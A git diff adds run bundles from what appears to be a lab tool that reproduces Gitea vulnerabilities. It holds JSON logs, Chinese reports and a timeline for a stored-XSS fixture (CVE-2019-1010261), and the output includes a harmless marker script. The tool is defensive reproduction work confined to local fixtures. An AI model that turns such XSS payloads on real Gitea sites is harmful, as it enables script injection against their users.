+  "url": "http://127.0.0.1:18102/",
+  "title": "Gitea Stored XSS Fixture",
+  "body_excerpt": "\n  \n    Gitea Stored XSS Fixture\n    Stored payload rendering path for browser proof capture.\n    Baseline ready\n    System: gitea / Family: xss\n    \n    \n    \n    \n    \n  \n\n"
+}
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline.json b/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline.json
new file mode 100644
index 00000000..40f0d09e
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline.json
@@ -0,0 +1,24 @@
+{
+  "observations": [
+    {
+      "url": "http://127.0.0.1:18102/",
+      "status_code": 200,
+      "headers": {
+        "Server": "BaseHTTP/0.6 Python/3.12.13",
+        "Date": "Wed, 18 Mar 2026 01:26:27 GMT",
+        "Content-Type": "text/html; charset=utf-8",
+        "Content-Length": "992"
+      },
+      "body_excerpt": "<!doctype html>\n<html lang=\"zh-CN\">\n<head>\n  <meta charset=\"utf-8\">\n  <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\n  <title>Gitea Stored XSS Fixture</title>\n  <style>\n    body { font-family: sans-serif; background: #0f172a; color: #e2e8f0; margin: 0; padding: 32px; }\n    main { max-width: 900px; margin: 0 auto; background: #111827; border: 1px solid #334155; border-radius: "
+    }
+  ],
+  "steps": [
+    {
+      "kind": "http-get",
+      "status": "completed",
+      "path": "/",
+      "status_code": 200,
+      "body_excerpt": "<!doctype html>\n<html lang=\"zh-CN\">\n<head>\n  <meta charset=\"utf-8\">\n  <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\n  <title>Gitea Stored XSS Fixture</title>\n  <style>\n    body "
+    }
+  ]
+}
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/docker/app.log b/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/docker/app.log
new file mode 100644
index 00000000..e69de29b
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/doctor.json b/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/doctor.json
new file mode 100644
index 00000000..baedfa63
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/doctor.json
@@ -0,0 +1,44 @@
+{
+  "status": "passed",
+  "ok": true,
+  "checks": [
+    {
+      "name": "docker-cli",
+      "ok": true,
+      "detail": "docker CLI available"
+    },
+    {
+      "name": "docker-daemon",
+      "ok": true,
+      "detail": "context=desktop-linux"
+    },
+    {
+      "name": "playwright-import",
+      "ok": true,
+      "detail": "playwright Python package import passed"
+    },
+    {
+      "name": "playwright-browser",
+      "ok": true,
+      "detail": "chromium runtime launch passed"
+    },
+    {
+      "name": "ports",
+      "ok": true,
+      "detail": "checked 1 host port bindings",
+      "bindings": [
+        {
+          "profile_id": "gitea-xss",
+          "service": "app",
+          "binding": "18102:3000",
+          "port": 18102
+        }
+      ]
+    }
+  ],
+  "profile_ids": [
+    "gitea-xss"
+  ],
+  "failure_count": 0,
+  "summary": "all checks passed"
+}
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-browser.json b/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-browser.json
new file mode 100644
index 00000000..5382ac85
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-browser.json
@@ -0,0 +1,14 @@
+{
+  "required": true,
+  "present": true,
+  "page_title": "Gitea Stored XSS Fixture - proof",
+  "page_url": "http://127.0.0.1:18102/",
+  "error_kind": null,
+  "refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/proof.png",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/proof-dom.html",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-console.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-network.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-page.json"
+  ]
+}
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-console.json b/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-console.json
new file mode 100644
index 00000000..fe51488c
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-console.json
@@ -0,0 +1 @@
+[]
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-network.json b/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-network.json
new file mode 100644
index 00000000..cdb46ccf
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-network.json
@@ -0,0 +1,6 @@
+[
+  {
+    "method": "GET",
+    "url": "http://127.0.0.1:18102/"
+  }
+]
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-page.json b/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-page.json
new file mode 100644
index 00000000..297d8e39
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-page.json
@@ -0,0 +1,5 @@
+{
+  "url": "http://127.0.0.1:18102/",
+  "title": "Gitea Stored XSS Fixture - proof",
+  "body_excerpt": "\n  \n    Gitea Stored XSS Fixture\n    Stored payload rendering path for browser proof capture.\n    Proof active: stored payload rendered inside the browser proof page\n    System: gitea / Family: xss\n    \n    document.documentElement.setAttribute('data-xss-proof','true');document.title = \"Gitea Stored XSS Fixture - proof\";XSS marker executed for gitea--CVE-2019-1010261\n    \n    \n    \n  \n\n"
+}
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/ready.json b/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/ready.json
new file mode 100644
index 00000000..8a5f8a0b
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/ready.json
@@ -0,0 +1,12 @@
+{
+  "status": "completed",
+  "detail": "baseline urls ready (1)",
+  "elapsed_seconds": 0.0,
+  "observations": [
+    {
+      "url": "http://127.0.0.1:18102/",
+      "status_code": 200
+    }
+  ],
+  "compose_path": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/compose/compose.yaml"
+}
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/seed.json b/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/seed.json
new file mode 100644
index 00000000..6cf7fa26
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/seed.json
@@ -0,0 +1,21 @@
+{
+  "steps": [
+    {
+      "kind": "runner",
+      "tool": "gitea.xss",
+      "status": "completed",
+      "status_code": 200,
+      "detail": "fixture seeded"
+    }
+  ],
+  "seeded": true,
+  "result": {
+    "status_code": 200,
+    "ok": true,
+    "body": {
+      "ok": true,
+      "detail": "fixture seeded",
+      "case_id": "gitea--CVE-2019-1010261"
+    }
+  }
+}
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/report.html b/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/report.html
new file mode 100644
index 00000000..74eb923e
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/report.html
@@ -0,0 +1,62 @@
+<!doctype html>
+<html><head><meta charset='utf-8'><title>websafe 运行报告</title>
+<style>body{font-family:ui-sans-serif,system-ui,sans-serif;margin:2rem;line-height:1.55;background:#f8fafc;color:#0f172a;} code,pre{background:#e2e8f0;padding:.2rem .4rem;border-radius:.3rem;} pre{white-space:pre-wrap;} .grid{display:grid;grid-template-columns:repeat(2,minmax(0,1fr));gap:1rem;} .card{border:1px solid #cbd5e1;padding:1rem;border-radius:.75rem;background:#fff;} table{width:100%;border-collapse:collapse;background:#fff;border:1px solid #cbd5e1;border-radius:.75rem;overflow:hidden;} th,td{padding:.75rem;border-bottom:1px solid #e2e8f0;text-align:left;vertical-align:top;} img{max-width:100%;border:1px solid #cbd5e1;border-radius:.5rem;} .gallery{display:grid;grid-template-columns:repeat(auto-fit,minmax(320px,1fr));gap:1rem;}</style>
+</head><body>
+<h1>运行 gitea-gitea--CVE-2019-1010261-20260318012624</h1>
+<div class='grid'>
+<div class='card'><strong>漏洞条目</strong><br><code>gitea--CVE-2019-1010261</code></div>
+<div class='card'><strong>实证状态</strong><br><code>verified-real</code></div>
+<div class='card'><strong>复现 Profile</strong><br><code>gitea-xss</code></div>
+<div class='card'><strong>Artifact 模式</strong><br><code>local-fixture</code></div>
+</div>
+<h2>Mermaid 时间线</h2>
+<pre>flowchart LR
+A[&quot;选择 Advisory&quot;] --&gt; B[&quot;解析 Repro Profile&quot;]
+B --&gt; C[&quot;生成 Compose 环境&quot;]
+C --&gt; D[&quot;采集基线快照&quot;]
+D --&gt; E[&quot;执行受控攻击步骤&quot;]
+E --&gt; F[&quot;浏览器回放验证&quot;]
+F --&gt; G[&quot;收集日志与证据&quot;]
+G --&gt; H[&quot;回写 Registry 与报告&quot;]</pre>
+<h2>运行时间线</h2>
+<table><thead><tr><th>时间</th><th>步骤</th><th>状态</th><th>说明</th></tr></thead><tbody>
+<tr><td><code>2026-03-18T01:26:24+00:00</code></td><td><code>select-advisory</code></td><td><code>completed</code></td><td>gitea--CVE-2019-1010261</td></tr>
+<tr><td><code>2026-03-18T01:26:24+00:00</code></td><td><code>resolve-repro-profile</code></td><td><code>completed</code></td><td>gitea-xss</td></tr>
+<tr><td><code>2026-03-18T01:26:24+00:00</code></td><td><code>doctor</code></td><td><code>completed</code></td><td>all checks passed</td></tr>
+<tr><td><code>2026-03-18T01:26:27+00:00</code></td><td><code>provision-compose-environment</code></td><td><code>ready</code></td><td>-</td></tr>
+<tr><td><code>2026-03-18T01:26:27+00:00</code></td><td><code>wait-ready</code></td><td><code>completed</code></td><td>baseline urls ready (1)</td></tr>
+<tr><td><code>2026-03-18T01:26:27+00:00</code></td><td><code>seed-environment</code></td><td><code>completed</code></td><td>steps=1</td></tr>
+<tr><td><code>2026-03-18T01:26:27+00:00</code></td><td><code>baseline-snapshot</code></td><td><code>completed</code></td><td>urls=1</td></tr>
+<tr><td><code>2026-03-18T01:26:28+00:00</code></td><td><code>browser-replay-before-attack</code></td><td><code>completed</code></td><td>-</td></tr>
+<tr><td><code>2026-03-18T01:26:28+00:00</code></td><td><code>controlled-attack-chain</code></td><td><code>completed</code></td><td>steps=1</td></tr>
+<tr><td><code>2026-03-18T01:26:29+00:00</code></td><td><code>browser-replay-after-attack</code></td><td><code>completed</code></td><td>-</td></tr>
+<tr><td><code>2026-03-18T01:26:29+00:00</code></td><td><code>collect-logs-and-evidence</code></td><td><code>completed</code></td><td>container_logs=1</td></tr>
+<tr><td><code>2026-03-18T01:26:30+00:00</code></td><td><code>cleanup-compose-environment</code></td><td><code>completed</code></td><td>docker compose down completed</td></tr>
+<tr><td><code>2026-03-18T01:26:30+00:00</code></td><td><code>update-registry-and-reports</code></td><td><code>completed</code></td><td>gitea-gitea--CVE-2019-1010261-20260318012624</td></tr>
+</tbody></table>
+<h2>攻击步骤</h2>
+<table><thead><tr><th>工具</th><th>状态</th><th>输出</th></tr></thead><tbody>
+<tr><td><code>gitea.xss</code></td><td><code>completed</code></td><td><code>/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/attack.json</code></td></tr>
+</tbody></table>
+<h2>浏览器截图</h2>
+<div class='gallery'>
+<figure><img src='assets/baseline.png' alt='baseline'><figcaption><code>assets/baseline.png</code></figcaption></figure>
+<figure><img src='assets/proof.png' alt='proof'><figcaption><code>assets/proof.png</code></figcaption></figure>
+</div>
+<h2>证据清单</h2><ul>
+<li><code>compose/compose.yaml</code></li>
+<li><code>assets/baseline.png</code></li>
+<li><code>assets/baseline-dom.html</code></li>
+<li><code>logs/baseline-console.json</code></li>
+<li><code>logs/baseline-network.json</code></li>
+<li><code>logs/baseline-page.json</code></li>
+<li><code>assets/proof.png</code></li>
+<li><code>assets/proof-dom.html</code></li>
+<li><code>logs/proof-console.json</code></li>
+<li><code>logs/proof-network.json</code></li>
+<li><code>logs/proof-page.json</code></li>
+<li><code>logs/docker/app.log</code></li>
+<li><code>logs/attack.json</code></li>
+<li><code>logs/baseline.json</code></li>
+</ul>
+</body></html>
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/report.md b/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/report.md
new file mode 100644
index 00000000..4b802bd9
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/report.md
@@ -0,0 +1,86 @@
+# 运行 gitea-gitea--CVE-2019-1010261-20260318012624
+
+> `LAB ONLY` | `AUTHORIZED TARGETS ONLY` | 自动生成 run bundle
+
+- 漏洞条目: `gitea--CVE-2019-1010261`
+- 系统: `gitea`
+- Repro Profile: `gitea-xss`
+- 实证状态: `verified-real`
+- 实证方式: `real`
+- Artifact 模式: `local-fixture`
+- 启动时间: `2026-03-18T01:26:24+00:00`
+- 完成时间: `2026-03-18T01:26:30+00:00`
+- 阻塞原因: `-`
+- Compose 服务: `app`
+
+## 运行时间线
+
+- Mermaid: [timeline.mmd](/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/timeline.mmd)
+
+| 时间 | 步骤 | 状态 | 说明 |
+|------|------|------|------|
+| `2026-03-18T01:26:24+00:00` | `select-advisory` | `completed` | gitea--CVE-2019-1010261 |
+| `2026-03-18T01:26:24+00:00` | `resolve-repro-profile` | `completed` | gitea-xss |
+| `2026-03-18T01:26:24+00:00` | `doctor` | `completed` | all checks passed |
+| `2026-03-18T01:26:27+00:00` | `provision-compose-environment` | `ready` | - |
+| `2026-03-18T01:26:27+00:00` | `wait-ready` | `completed` | baseline urls ready (1) |
+| `2026-03-18T01:26:27+00:00` | `seed-environment` | `completed` | steps=1 |
+| `2026-03-18T01:26:27+00:00` | `baseline-snapshot` | `completed` | urls=1 |
+| `2026-03-18T01:26:28+00:00` | `browser-replay-before-attack` | `completed` | - |
+| `2026-03-18T01:26:28+00:00` | `controlled-attack-chain` | `completed` | steps=1 |
+| `2026-03-18T01:26:29+00:00` | `browser-replay-after-attack` | `completed` | - |
+| `2026-03-18T01:26:29+00:00` | `collect-logs-and-evidence` | `completed` | container_logs=1 |
+| `2026-03-18T01:26:30+00:00` | `cleanup-compose-environment` | `completed` | docker compose down completed |
+| `2026-03-18T01:26:30+00:00` | `update-registry-and-reports` | `completed` | gitea-gitea--CVE-2019-1010261-20260318012624 |
+
+## Compose 拓扑
+
+- Compose 文件: `/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/compose/compose.yaml`
+- 服务列表: `app`
+
+## 攻击步骤
+
+| 工具/步骤 | 状态 | 结果 |
+|-----------|------|------|
+| `gitea.xss` | `completed` | `/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/attack.json` |
+
+## 证据摘要
+
+- Baseline: `1`
+- 攻击步骤: `1`
+- 浏览器证据: `10`
+- 容器日志: `1`
+- 请求日志: `2`
+
+## 浏览器截图
+
+![baseline](assets/baseline.png)
+![proof](assets/proof.png)
+
+## 浏览器证据
+
+- `assets/baseline.png`
+- `assets/baseline-dom.html`
+- `logs/baseline-console.json`
+- `logs/baseline-network.json`
+- `logs/baseline-page.json`
+- `assets/proof.png`
+- `assets/proof-dom.html`
+- `logs/proof-console.json`
+- `logs/proof-network.json`
+- `logs/proof-page.json`
+
+## 容器日志
+
+- `logs/docker/app.log`
+
+## 请求与基线日志
+
+- `logs/attack.json`
+- `logs/baseline.json`
+
+## 最小化验证说明
+
+- 仅限自有资产、本地靶场或已授权实验目标。
+- 默认执行 minimal-proof；不会把破坏性或不可回滚动作作为默认路径。
+- 若浏览器证据缺失，前端类案例不会被标为 `verified-*`。
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/run.json b/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/run.json
new file mode 100644
index 00000000..800fc33d
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/run.json
@@ -0,0 +1,197 @@
+{
+  "run_id": "gitea-gitea--CVE-2019-1010261-20260318012624",
+  "system_id": "gitea",
+  "advisory_id": "gitea--CVE-2019-1010261",
+  "repro_profile_id": "gitea-xss",
+  "verification_status": "verified-real",
+  "verification_mode": "real",
+  "artifact_mode": "local-fixture",
+  "target_env": "local-docker",
+  "compose_services": [
+    "app"
+  ],
+  "baseline_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline.json"
+  ],
+  "attack_steps": [
+    {
+      "kind": "runner",
+      "tool": "gitea.xss",
+      "status": "completed",
+      "status_code": 200,
+      "result_path": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/attack.json"
+    }
+  ],
+  "browser_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/baseline.png",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/baseline-dom.html",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-console.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-network.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-page.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/proof.png",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/proof-dom.html",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-console.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-network.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-page.json"
+  ],
+  "browser_evidence": {
+    "required": true,
+    "present": true,
+    "refs": [
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/baseline.png",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/baseline-dom.html",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-console.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-network.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-page.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/proof.png",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/proof-dom.html",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-console.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-network.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-page.json"
+    ],
+    "baseline_refs": [
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/baseline.png",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/baseline-dom.html",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-console.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-network.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline-page.json"
+    ],
+    "proof_refs": [
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/proof.png",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/proof-dom.html",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-console.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-network.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/proof-page.json"
+    ],
+    "baseline_title": "Gitea Stored XSS Fixture",
+    "proof_title": "Gitea Stored XSS Fixture - proof",
+    "error_kind": null,
+    "reason": null
+  },
+  "container_log_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/docker/app.log"
+  ],
+  "request_log_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/attack.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/logs/baseline.json"
+  ],
+  "compose_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/compose/compose.yaml"
+  ],
+  "timeline": [
+    {
+      "at": "2026-03-18T01:26:24+00:00",
+      "step": "select-advisory",
+      "status": "completed",
+      "detail": "gitea--CVE-2019-1010261"
+    },
+    {
+      "at": "2026-03-18T01:26:24+00:00",
+      "step": "resolve-repro-profile",
+      "status": "completed",
+      "detail": "gitea-xss"
+    },
+    {
+      "at": "2026-03-18T01:26:24+00:00",
+      "step": "doctor",
+      "status": "completed",
+      "detail": "all checks passed"
+    },
+    {
+      "at": "2026-03-18T01:26:27+00:00",
+      "step": "provision-compose-environment",
+      "status": "ready",
+      "detail": ""
+    },
+    {
+      "at": "2026-03-18T01:26:27+00:00",
+      "step": "wait-ready",
+      "status": "completed",
+      "detail": "baseline urls ready (1)"
+    },
+    {
+      "at": "2026-03-18T01:26:27+00:00",
+      "step": "seed-environment",
+      "status": "completed",
+      "detail": "steps=1"
+    },
+    {
+      "at": "2026-03-18T01:26:27+00:00",
+      "step": "baseline-snapshot",
+      "status": "completed",
+      "detail": "urls=1"
+    },
+    {
+      "at": "2026-03-18T01:26:28+00:00",
+      "step": "browser-replay-before-attack",
+      "status": "completed",
+      "detail": ""
+    },
+    {
+      "at": "2026-03-18T01:26:28+00:00",
+      "step": "controlled-attack-chain",
+      "status": "completed",
+      "detail": "steps=1"
+    },
+    {
+      "at": "2026-03-18T01:26:29+00:00",
+      "step": "browser-replay-after-attack",
+      "status": "completed",
+      "detail": ""
+    },
+    {
+      "at": "2026-03-18T01:26:29+00:00",
+      "step": "collect-logs-and-evidence",
+      "status": "completed",
+      "detail": "container_logs=1"
+    },
+    {
+      "at": "2026-03-18T01:26:30+00:00",
+      "step": "cleanup-compose-environment",
+      "status": "completed",
+      "detail": "docker compose down completed"
+    },
+    {
+      "at": "2026-03-18T01:26:30+00:00",
+      "step": "update-registry-and-reports",
+      "status": "completed",
+      "detail": "gitea-gitea--CVE-2019-1010261-20260318012624"
+    }
+  ],
+  "success_evaluation": {
+    "passed": true,
+    "verification_status": "verified-real",
+    "blocked_reason": null,
+    "assertions": [
+      {
+        "name": "baseline-ok",
+        "kind": "baseline-ok",
+        "passed": true,
+        "detail": "baseline URLs responded without 5xx or transport errors"
+      },
+      {
+        "name": "runner-success",
+        "kind": "runner-success",
+        "passed": true,
+        "detail": "stored payload rendered inside the browser proof page"
+      },
+      {
+        "name": "browser-present",
+        "kind": "browser-present",
+        "passed": true,
+        "detail": "browser evidence captured"
+      }
+    ]
+  },
+  "historical_status": "verified-real",
+  "latest_status": "verified-real",
+  "started_at": "2026-03-18T01:26:24+00:00",
+  "finished_at": "2026-03-18T01:26:30+00:00",
+  "blocked_reason": null,
+  "report_refs": {
+    "bundle_dir": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624",
+    "report_md": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/report.md",
+    "report_html": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/report.html",
+    "timeline": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/timeline.mmd"
+  }
+}
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/timeline.mmd b/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/timeline.mmd
new file mode 100644
index 00000000..71155437
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/timeline.mmd
@@ -0,0 +1,8 @@
+flowchart LR
+A["选择 Advisory"] --> B["解析 Repro Profile"]
+B --> C["生成 Compose 环境"]
+C --> D["采集基线快照"]
+D --> E["执行受控攻击步骤"]
+E --> F["浏览器回放验证"]
+F --> G["收集日志与证据"]
+G --> H["回写 Registry 与报告"]
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/baseline-dom.html b/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/baseline-dom.html
new file mode 100644
index 00000000..c922e78c
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/baseline-dom.html
@@ -0,0 +1,26 @@
+<!DOCTYPE html><html lang="zh-CN"><head>
+  <meta charset="utf-8">
+  <meta name="viewport" content="width=device-width, initial-scale=1">
+  <title>Gitea Proxy Boundary Fixture</title>
+  <style>
+    body { font-family: sans-serif; background: #0f172a; color: #e2e8f0; margin: 0; padding: 32px; }
+    main { max-width: 900px; margin: 0 auto; background: #111827; border: 1px solid #334155; border-radius: 16px; padding: 24px; }
+    .proof { padding: 14px; border-radius: 12px; background: #14532d; color: #dcfce7; }
+    .baseline { padding: 14px; border-radius: 12px; background: #1e3a8a; color: #dbeafe; }
+    code { background: rgba(255,255,255,0.08); padding: 2px 6px; border-radius: 6px; }
+  </style>
+</head>
+<body>
+  <main>
+    <h1>Gitea Proxy Boundary Fixture</h1>
+    <p>Forwarded header trust boundary and admin gate fixture.</p>
+    <div class="baseline">Baseline ready</div>
+    <p>System: <code>gitea</code> / Family: <code>proxy-boundary</code></p>
+    
+    
+    
+    
+    
+  </main>
+
+</body></html>
\ No newline at end of file
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/baseline.png b/06-case-studies/generated-runs/gitea-gitea--CVE-2020-13246-20260318012806/assets/baseline.png
new file mode 100644
index 0000000000000000000000000000000000000000..d683db72cbf4cb1cb8f048ee5e9d66f5960ccb55
GIT binary patch
literal 28111
zcmd?RWmr>x{6CDMBBG$EG@_)mfRvPq(v5UX=|*zEfLVZagLG~*NRAql?i?^+u+iP!
z{14y%^?PtXxUcJea6h=?(V1s*4%_*>-|ts_2vk#%eQ=NF9svQt19`a*8UzHlftNQ2
z?%o6rZy6MB5D+{hkpJ-RlSlIU)NPLu3);4w;Ri3d{f1^+gX+%wN$KszsQ3+uumRYC
znax*Jo11-K!C>x94PHFj-%mPphyr_dwPA>yWn*ItSm=wcFLib8%>}MXK(Gz6%=_;}
zI>F6X*C*Z*-}-!g{6>EF-}RAz<>9yg{)57E0>bNm$Gj!DbA5dIo#6iUQSIgps_SF=
zt^YS(AOx(dXJCLG8=Dx{$4-ooP3Y_ETLYiwABO4qKRl+r9n+4*VB7mK7<|7f;pIny
zHrhTO;yF<<qT6>)PrSNOl>N`9j`ntl@82H)e(YOGfS(_%vZyG=b@okLc~z-^urT!W
zcyNx0?Dbo851o;Kjam{cHrAkQo;OXx^K|)g4O1cr{NOaIsi&uh@7?==>M&zW3DF(3
zDfJXT`{Z9VPbl!?<1D3Ei4xnAR4MfJO|IzDba;J`pc*z+_NfLOj^>FBfwq3s6ZW4!
zZf;K1Qaqvh@8MplfB$}?|Cv<CV+^0~&G;qNG#j<2H*}4ne1TgZuk#_Kfs4H*#+4Xb
zS?J%yw3vN1fAsC?Q~bD|4JsQ1y!W!TAJab3*4EV)XPYr%R{TyPPFs5?Ihg^E%DP??
zL7uK#D&9-CDB{E)%6`1{`DqP{qVLhD)&t-@wV|mbovCOxO!~8%f1Q&J$s4>6Tksg2
z>opWJzqGcudLqCUe~adcG=X+lR{0)U_UQV1c>6{584m2qNWd9DP)NaPyO#d%AEpFk
